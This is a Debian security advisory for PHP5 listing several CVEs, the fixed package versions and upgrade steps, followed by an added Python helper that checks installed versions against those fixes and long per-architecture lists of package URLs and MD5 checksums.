    Stefan Esser discovered that execution control flow inside the zend_alter_ini_entry() function is handled incorrectly in case of a memory limit violation.

CVE-2007-4660

    Gerhard Wagner discovered an integer overflow inside the chunk_split() function.

CVE-2007-5898

    Rasmus Lerdorf discovered that incorrect parsing of multibyte sequences may lead to disclosure of memory contents.

CVE-2007-5899

    It was discovered that the output_add_rewrite_var() function could leak session ID information, resulting in information disclosure.

This update also fixes two bugs from the PHP 5.2.4 release which don't have security impact according to the Debian PHP security policy (CVE-2007-4657 and CVE-2007-4662), but which are fixed nonetheless.

For the stable distribution (etch), these problems have been fixed in version 5.2.0-8+etch9.

The old stable distribution (sarge) doesn't contain php5.

For the unstable distribution (sid), these problems have been fixed in version 5.2.4-1, with the exception of CVE-2007-5898 and CVE-2007-5899, which will be fixed soon.

Please note that Debian's version of PHP is hardened with the Suhosin patch beginning with version 5.2.4-1, which renders several vulnerabilities ineffective.

We recommend that you upgrade your php5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
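To decide whether an installed php5 package already carries the fix named above, the version string has to be compared under dpkg's ordering rules (epoch, upstream version, Debian revision; digit runs compare numerically, a tilde sorts before anything else), which is why "5.2.0-8+etch10" would count as newer than "5.2.0-8+etch9". Here is an added Python helper (not part of the advisory or of Debian's tooling) that implements those rules so the check can run on a host without dpkg; the fixed versions are the ones the advisory states, the inventory is a constructed sample, and the function names are made up.

```python
"""Check installed php5 versions against the fixed versions in DSA-1444-1.

Added example, not Debian tooling: it re-implements the ordering dpkg uses
for '[epoch:]upstream[-revision]' strings so the comparison can run where
dpkg --compare-versions is unavailable.
"""

# Fixed versions as stated in the advisory. For sid, 5.2.4-1 still leaves
# CVE-2007-5898 and CVE-2007-5899 open according to the advisory text.
FIXED_VERSIONS = {
    "etch": "5.2.0-8+etch9",
    "sid": "5.2.4-1",
}


def _order(ch):
    """dpkg's character weight: '~' < end-of-string/digit < letters < other."""
    if ch == "~":
        return -1
    if ch.isdigit():
        return 0
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256


def _cmp_fragment(a, b):
    """Compare one upstream-version or revision string the way dpkg does."""
    i = j = 0
    while i < len(a) or j < len(b):
        # Non-digit run: compare character weights; end-of-string weighs 0.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return -1 if ac < bc else 1
            i += 1
            j += 1
        # Digit run: drop leading zeros, then compare numerically.
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        first_diff = 0
        while i < len(a) and j < len(b) and a[i].isdigit() and b[j].isdigit():
            if first_diff == 0:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1   # a has more digits left, so its number is larger
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return -1 if first_diff < 0 else 1
    return 0


def _split(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        head, version = version.split(":", 1)
        epoch = int(head)
    if "-" in version:
        upstream, revision = version.rsplit("-", 1)  # revision follows the last '-'
    else:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 as Debian version a is older than, equal to, or newer than b."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    if ea != eb:
        return -1 if ea < eb else 1
    result = _cmp_fragment(ua, ub)
    if result:
        return result
    return _cmp_fragment(ra, rb)


def is_fixed(installed, suite):
    """True when the installed php5 version is at or above the advisory's fixed version."""
    return compare_versions(installed, FIXED_VERSIONS[suite]) >= 0


if __name__ == "__main__":
    # Constructed sample inventory: host -> (suite, installed php5 version).
    inventory = {
        "web1": ("etch", "5.2.0-8+etch8"),
        "web2": ("etch", "5.2.0-8+etch9"),
        "dev1": ("sid", "5.2.4-1~rc1"),
    }
    for host, (suite, version) in inventory.items():
        print(host, version, "fixed" if is_fixed(version, suite) else "NOT fixed")
```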
http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 95630 969755e8020136d912c586675410b0f6 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 76590 147304358e6e13c41b410daa68515d7d http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 48312 2b5945dc151f65ec3e8e6b7c57c3a980 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 17762 f00b19d49b08bcae259bfdf68a862acd http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 15432 550d2d43da780dc7cd0609059200af6c http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 6488 f68c83086ca16aa61a78885e1f9a6a08 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 342036 cb99d71765e36bb658aad0874bb683c7 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 34388 14c58b4205ef46f07f806559ed8db50f http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 54514 a109cd07c393cddec2c3725a1113ce65 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 17554 78a08884e87c6a8e0d375d6520d4dc55 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 50162 cb3332061f349f07106f1a8b7f1b00fd http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 3271182 93168846e606d80cb3bda8ab310107f3 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 235074 712c5b1aca804a77cebf5e063a7ec889 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 3270024 
660749c62de37b66629f904eceefd720 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 50646 958f4d2c0944069312dea11bc6c2a7e5 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 34392 7409622d4643867888253a3ab768f8fa http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 6122 d848d21d8bd5341a36325f88cf687f49 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 54666 155ac193949554b9adfcb7f3e30b3f47 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 48320 11c715c5586adf7643b7cb8f3054a8ad http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 54514 c5a1d767cebc78dacd0d49d356034edd http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 17764 6a1ebceb96b098b0438e26a47a6a05e9 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 3270558 31ccb9c80e32093fccc5f7960086a294 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 50156 29d9896783363b2a1e6cce3d5bd5e453 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 234968 574f1234c28b8faf0a28ad91479997f6 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 25084 2299caf83e641d5a4a28b58d6d69627d http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 3220368 74b4f0939600a0635bf2681df7b0b44a http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 27142 a33ffaa6e5b42836ead783d65c0e6c0e http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_ia64.deb 
Size/MD5 checksum: 24858 f09ea3d5d9bb5ad55f10cb66dd4603d0 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 50656 207e54ebad3fbe865c18d89fb39d8eec http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 3270786 923384c6e57d80807fe17dc6fe2bc25c http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 12004 ced93ac701c4a9e2caa6bcf682f2cbaf http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 54668 e0282faabbfc912f5521dbe4be800133 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 25080 69b66b37dd69b0372ec5ad50f7ec8c25 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 24862 61aa341cf6fdd4f35c45a6a333bd7453 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 6396860 f01ca9b6d02642002dbe6ef20623d0e3 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 3221634 9fd85e0c9e5e7b2d1a423a7b5335aafe http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 95614 7acf56ae45e6f4ddf1176acff42d1efa http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 12010 85b5643639bce577485adf8558519b07 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 27138 c6d65a350282e784564e152f35136e46 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 6498 8182f460230240402c387c6a560c9402 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 15432 14c3fe1caf8177ae41d793e73132a9af 
http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_ia64.deb Size/MD5 checksum: 6124 4c853db5f47a1af93bb7a0178cdb7372 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 342044 01369f913f34ed1004f9d7c5b41566b3 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 17552 76bfd161c4f3998e7f3426c75809e52b http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_ia64.deb Size/MD5 checksum: 76592 d1675bcb173c07393c8e6978d0533c98 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 4886552 fdacbf13158601c6e396a1a1c58747ef http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 18484 896a72a9e6f091a5cab4416e40b9b2c8 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 17306 8b2f4d54b7095a8ab738597ff299567c http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 35588 33d6aefad55970aa5dd25413ff413f7a http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 5244 7fc5c13f6ec60f78761b0cd0b90d7979 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 35132 2b48b354d2230f734d9c86e84ab10cd7 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 4900 588d1a49f3b5db33e280b34039a6a241 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 12210 ff490058759d0c0036abfb826ca401b7 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 15722 9882b273088192068de9417aae5a7c84 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_mips.deb 
Size/MD5 checksum: 49470 1e4fe5d24559245351410f780eb546ca http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 12460 4adb8cca7a214cfcbbef73ad00ee83ff http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 2457442 62a300381827ff22616fc342710b9c79 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 8260 faa243584720f6b8e949d07c622d855c http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 63872 a65478388bcdf4adb3073910199ac449 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 2485474 63006e452be7ff16556eb8dad83d8e96 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 11334 62846c1108f2d94230bd57c37413b94f http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 31640 b9c75aac789241aa1479ce6e953da597 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 33156 66407cc2ba1262a1d620afa2fac28cb7 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 2486004 f4f79d5a59a84339193d3bb1792481fa http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 215690 5b34b952dd8842fcb4c94371104a583b http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 23286 125b4888c1325def8caa251a2f661b6d http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 342158 5d2ea96268ce79fe9e7ecd5c7c84020b http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_mips.deb Size/MD5 checksum: 32666 487a97250199d6aabe81803fbfac31db mipsel architecture (MIPS (Little Endian)) 
http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 12136 abb2bb3df3f2c2abc3684640cbfc0538 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 17250 c6cd0e428bd107bed1c4da9f2674185d http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 15638 416e96cb18d25535576a23c726af5cbb http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 63400 cf9e66b0b875abfeb2f40c560454d4fb http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 215110 20adfd638a7c5d0eb73af091f52db204 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 342172 18bc83bffe3719845381e57bbbedc2fd http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 31584 cb93ea2a733f5b17f2743a73cdba394b http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 15640 6731f72daae0764b2a44e37daf56b66f http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 2441468 a2f7cb80708bca0f6d1ee1afbb5b8aef http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 8208 1324d9be3aa69da22a1bccbd6ba57875 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 2442310 ce995db11e825960a8254bd62626876a http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 34928 b3716b8b438aeb3d2a43d189f82299e8 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 33088 dd32e149ad42842a4c26b2cb81352166 
http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 17254 9695ce42d92e2bf5f2657babc7454676 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 11262 1096263c5102d7f203d1cccd51321091 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 5234 0bdc2e0e38573d5aebca10e3b4813fdc http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 4898 135396b2d32c92e4c5d61a5201166d5d http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 23314 661eb58dec09d8eb87325ab3f25556cf http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 8206 5d5c254cf651bd95c465b5fd5bd6d548 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 18460 7a745ace413bffa457f36f2e2a30beba http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 4830564 8b7bc5eb47478c37f65b7ae7887acec1 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 18458 66c596ae06bbb35cb8b065bcb97d584b http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 2431484 9531cc2f381779dbf517e59caeb56011 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 49400 9ccc013c11ba5202f3b92df976e13626 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 2442976 892fe8b525fe2bd6680848b5f55a8f8f http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 12426 000024744d15ca435a4768ce91ef9e9f http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_mipsel.deb Size/MD5 
checksum: 32172 99aa9cf8b9a2171b9c89f6fc6bb7fd5a http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 32172 61369e34a951af721369b7b06bc5d761 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 12428 d4fe061c8e2fbb0f10b3764c9ae7fe97 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 2442244 4ee8213ff6d517643325af8b31d422ca http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 2432016 978356dc38a8ff3a69be83385a582cfc http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 342178 c1d40fb12f9c126a914cf219f2eadd93 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 5238 e410a362032bd3a0295f847f047f63ba http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 11262 d56663e21ea0e3022da2c1f6f774e0eb http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 23312 c169910ff8d2b1179289d353319f6350 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 34928 5aeda58d82e03a986afffd3f89d7da98 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 215292 fa8b8aa5f6c283338b78db3f1551eaca http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 35562 7d2dbdf86cce1c8d6f9e47b04690b31c http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 31586 83624c7a1c3ca10329ebdb7b5e4186b9 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 35560 26bceb8862555cb0dbc18ffe1dcff315 
http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 33080 1c027dc4facee12c2aba3451ca9d76a1 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 4896 6a19831c18e7b9ae25bf5d0819220f82 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_mipsel.deb Size/MD5 checksum: 49402 2857db4ff892f139a072d602244ac411 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 12138 652a60fb99aa9cee23788f8cc0eb5c82 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 63406 2fc268c4da12dc3d7d3908933b8b724c http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_mipsel.deb Size/MD5 checksum: 4829450 af090273c9a156cbd578c5bc7e85bdd6 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 2515848 7d04226243cd9d7fcb23e5527d2a1a97 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 4898534 47eea0e50e929ca097d8b0c3f5d1b9b9 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 6340 90ed951c8bda6b6dec685fbc222f7db2 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 6342 15cbc2d9f41d8dfda6d9b3427488dcd9 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 37704 3dace1652d4abc5547bd71a0a13085f5 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 35990 0dbb065e3899716d1136ef1c260b8e3b http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 70370 669f61b096340d412b861e1e84a06f1b 
http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 37080 35f6a789eb308f4388417f8205ad94bb http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 20240 08683176020e81284970d4a42307b29c http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 10108 d7247ef4034bd770ea6bd9a74ce4a149 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 26752 d28e747fe74d94113008729934fb215e http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 70360 6d73762f1de824d0fe4570907c2e6dcd http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 13742 1d5272447a12a3b5ae8ae1464b5a8327 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 36312 c3dd3ac413f8fc96d984128c68cb5176 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 18450 5445e7d5724bdf8b31272d251e48f113 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 26756 f2e9d494bc59368e1b48f138fd7d0385 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 6738 3d25461406747baa2cb21b04c429132b http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 20234 8644fcd82fa0a9e459724d2f88eb3a29 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 218124 3c6ca3ffc4e443aff3f9cbebc6dba9a4 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 2465196 2b6ca6219dc64ddd16197a456e2ef244 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_powerpc.deb 
Size/MD5 checksum: 38012 1e6740a61bb44742bc67cb59c2dc277d http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 14738 41a3e6bef7d372bc3e1a6371786e0bbe http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 37084 6e350c2d70e7d33ec86e6938f2d5da95 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 2516218 7dce78ce888f3e97421238d301506bba http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 342058 29a5fd40376197a79fcef82f0a69cf4b http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 342144 061faf6f5dbcd99a7bfd2373f55d28dd http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 218288 42c46ad86cb563d3f12d4d4b293582d7 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 37712 9b92739cf4b001aa87c9a63bde5a7718 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 19178 dffa98f0124f240c3039e6c6fbce1302 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 35996 610f91206b5eed952e0343e8cf99b6ce http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 10106 b1b914ddac45b7b775246eabdb7b3e87 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 14744 6751b9ce18560362df7dd5c5b99ef3c3 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 12696 157cadc3fbe7c5c035f9c857374f6e82 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 2465544 a8ec0bc80282b7822e017cf44cfd5357 
